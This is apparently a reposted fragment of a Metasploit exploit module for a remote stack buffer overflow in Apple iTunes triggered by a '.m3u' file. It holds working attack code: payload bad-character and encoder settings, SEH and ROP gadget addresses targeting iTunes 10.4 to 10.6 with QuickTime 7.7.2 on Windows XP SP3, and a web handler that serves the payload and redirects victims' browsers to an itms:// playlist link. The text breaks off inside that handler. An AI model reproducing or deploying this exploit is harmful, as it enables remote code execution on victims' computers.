Apple iTunes '.m3u'文件远程栈缓冲区溢出漏洞(2)

'Platform'          => ['win'],
            'Payload'           =>
                {
                    'Space'     => 1000,
                    'BadChars'  => "\x00\x0a\x0d",
                    'DisableNops'   => true,
                    'PrependEncoder'    => "\x81\xc4\xfc\xfb\xff\xff"   # ADD ESP, -0x404
                },
            'Targets'           =>
                [
                    ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
                        {
                            'Platform'  => 'win',
                            'Arch'      => ARCH_X86,
                            'SEH'       => 0x6693afab,  # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
                            'ROP_NOP'   => 0x66801044   # RET
                        }
                    ]
                ],
            'DefaultTarget'     => 0
        ))

register_options(
            [
                # IP has to be an reachable address and not 0.0.0.0 as it is used to redirect the browser to itms://<IP>
                OptString.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine (not 0.0.0.0 !)", ""]),
                OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
                OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
            ],
            self.class
        )
    end

def on_request_uri(cli,request)

# re-generate the payload
        return if ((p = regenerate_payload(cli).encoded) == nil)

host = request.headers['HOST']
        agent = request.headers['USER-AGENT']

# iTunes browser link
        m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
